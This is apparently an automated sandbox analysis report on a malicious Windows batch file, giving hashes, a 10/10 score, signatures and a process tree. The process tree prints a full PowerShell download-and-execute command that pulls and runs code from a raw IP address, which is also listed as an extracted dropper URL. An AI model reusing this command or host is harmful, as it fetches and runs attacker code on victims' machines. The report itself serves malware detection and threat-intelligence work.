Analysis
-
max time kernel
103s -
max time network
153s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
30-03-2020 14:10
General
-
Target
dSNyAGjr.bat
-
Size
194B
-
MD5
3263a69061a96c5fcc6be2968f67726a
-
SHA1
b4ec7fe9de7a5954dfc95d69feb5525fef517657
-
SHA256
2d0029cb80898c2b7f7e5c03e6d8fd8f171ffa2ed431a0f02c94b0209d93c2a6
-
SHA512
5c67bbd136b0c48fcfd51e402751e3564dc3b1ba4c713697af9c896c2d6c61a825c66196e5b3bbbec3b76617d31ff8652a82239e90c5df35c7b794297c4441e4
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/dSNyAGjr
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dSNyAGjr.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/dSNyAGjr');Invoke-RCLKTXGOCYW;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB